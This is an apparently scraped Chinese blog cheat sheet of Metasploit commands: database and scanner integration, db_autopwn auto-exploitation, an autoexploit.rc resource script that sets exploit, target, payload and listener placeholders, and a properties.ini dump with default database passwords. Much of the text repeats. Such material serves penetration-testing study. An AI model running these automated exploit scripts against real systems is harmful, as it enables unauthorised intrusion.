metasploit 常用命令汇总
2015-12-21 17:00
597 查看
1.连接数据并显示一些信息
db_connet username:password@ip address/database name
db_destroy 同上
db_import 文件名字
db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数
db_vlns // 显示漏洞名字
2.nmap扫描
db_nmap -sS -nP ip address
db_nmap -h
3.nexpose在metasploit的使用
load nexpose // 加载nexpose插件
nexpose -h
nexpose_connect 用户名:密码@ip地址:端口号 认证字符
nexpose_scan ip地址
db_hosts -c address // 显示漏洞信息
4.nessus在metasploit的使用
load nessus
nessus_connect 用户名:密码@ip地址:端口号 认证字符
nessus_policy_list //显示策略列表
nessus_scan_new
nessus_scan_new 2 bridge_scan ip地址
nessus_scan_status //显示状态
nessus_report_list // 报告列表
nessus_report_get 报告名字 // 显示报告
db_hosts -c address,svcs,vlns
db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞
5.搜索漏洞
search mysql // 搜索mysql的漏洞
6.保存metasploit用过的命令到文件
makerc 路径/文件名字
自动审计,运行检测
7.脚本如下
8.第1种运行脚本的方法:
9.第2种运行脚本的方法:
10.配置文件说明
<1>.metasploit的全局配置文件在安装目录下,文件名为properties.ini
<2>.properties.ini的信息如下:
[General] // metasploit通用设置栏
base_stack_name=Metasploit
base_stack_version=4.3.0
installdir=D:\metasploit //matasploit 安装路径
[Postgres] // postgresql数据库栏
postgres_binary_directory=D:\metasploit/postgresql/bin //postgresql数据库bin路径
postgres_port=7337 //postgresql数据库的端口号
postgres_root_directory=D:\metasploit/postgresql //postgresql数据库的数据目录
postgres_root_password=b83a7446 //postgresql数据库的默认账户为postgres,默认密码就是此栏
postgres_unique_service_name=metasploitPostgreSQL-1 //postgresql数据库的服务名
rapid7_database_password=20f25188
rapid7_database_user=msf3 //postgresql数据库中的新建的账号为msf3,密码为20f25188
[Ruby]
ruby_root_directory=D:\metasploit/ruby // ruby的安装目录
[NginX] // nginx服务器设置
nginx_ssl_days=3650
nginx_ssl_name=goodjob-PC
nginx_ssl_port=3790 // nginx服务器的端口号
db_connet username:password@ip address/database name
db_destroy 同上
db_import 文件名字
db_hosts -c address,svcs,vulns // 显示ip地址,服务器,漏洞数
db_vlns // 显示漏洞名字
2.nmap扫描
db_nmap -sS -nP ip address
db_nmap -h
3.nexpose在metasploit的使用
load nexpose // 加载nexpose插件
nexpose -h
nexpose_connect 用户名:密码@ip地址:端口号 认证字符
nexpose_scan ip地址
db_hosts -c address // 显示漏洞信息
4.nessus在metasploit的使用
load nessus
nessus_connect 用户名:密码@ip地址:端口号 认证字符
nessus_policy_list //显示策略列表
nessus_scan_new
nessus_scan_new 2 bridge_scan ip地址
nessus_scan_status //显示状态
nessus_report_list // 报告列表
nessus_report_get 报告名字 // 显示报告
db_hosts -c address,svcs,vlns
db_autopwn -e -t -r -x -p // 自动运行检测数据库中得到的漏洞
5.搜索漏洞
search mysql // 搜索mysql的漏洞
6.保存metasploit用过的命令到文件
makerc 路径/文件名字
自动审计,运行检测
7.脚本如下
echo use 漏洞名字 >autoexploit.rc
echo set RHOST IP地址 >> autoexploit.rc
echo set PAYLOAD shellcode名字 >> autoexploit.rc
echo set LHOST IP地址 >> autoexploit.rc
echo exploit >> autoexploit.rc
echo set RHOST IP地址 >> autoexploit.rc
echo set PAYLOAD shellcode名字 >> autoexploit.rc
echo set LHOST IP地址 >> autoexploit.rc
echo exploit >> autoexploit.rc
8.第1种运行脚本的方法:
msfconsole -r autoexploit.rc
9.第2种运行脚本的方法:
msfconsole
resource autoexploit.rc
resource autoexploit.rc
10.配置文件说明
<1>.metasploit的全局配置文件在安装目录下,文件名为properties.ini
<2>.properties.ini的信息如下:
[General] // metasploit通用设置栏
base_stack_name=Metasploit
base_stack_version=4.3.0
installdir=D:\metasploit //matasploit 安装路径
[Postgres] // postgresql数据库栏
postgres_binary_directory=D:\metasploit/postgresql/bin //postgresql数据库bin路径
postgres_port=7337 //postgresql数据库的端口号
postgres_root_directory=D:\metasploit/postgresql //postgresql数据库的数据目录
postgres_root_password=b83a7446 //postgresql数据库的默认账户为postgres,默认密码就是此栏
postgres_unique_service_name=metasploitPostgreSQL-1 //postgresql数据库的服务名
rapid7_database_password=20f25188
rapid7_database_user=msf3 //postgresql数据库中的新建的账号为msf3,密码为20f25188
[Ruby]
ruby_root_directory=D:\metasploit/ruby // ruby的安装目录
[NginX] // nginx服务器设置
nginx_ssl_days=3650
nginx_ssl_name=goodjob-PC
nginx_ssl_port=3790 // nginx服务器的端口号
相关文章推荐
- Gartner 如何看 RASP 和 WAF?
- Gartner 如何看 RASP 和 WAF?
- ASP.NET Web API 2基于令牌的身份验证
- C#(ASP.NET)错误: 无法获取属性“0”的值: 对象为 null 或未定义 关键字 'user' 附近有语法错误。
- ASP.NET MVC自定义异常处理
- Asp.net(C#)年月日时分秒毫秒
- ASP.NET伪静态实现
- asp.net中,<%#%>,<%=%>和<%%>分别是什么意思,有什么区别
- 6种方法实现asp.net返回上一页
- Asp.Net 之 调用分享接口
- ASP.NET MVC 身份认证
- ASP.NET cache缓存的用法
- 让IIS支持ASPX,添加Web服务扩展的方法
- asp.net Operation failed, unable to locate the solution directory
- .Net学习(三):初识ASP.Net
- ASP.NET实现网页版小优盘
- ASP.NET实现网页版小优盘
- 通过iis访问asp.net网站
- 在ASP.NET MVC 3 中自定义AuthorizeAttribute时需要注意的页面缓存问题
- asp.net发布到IIS中出现错误:处理程序“PageHandlerFactory-Integrated”在其模块列表中有一个错误模块“ManagedPipelineHandler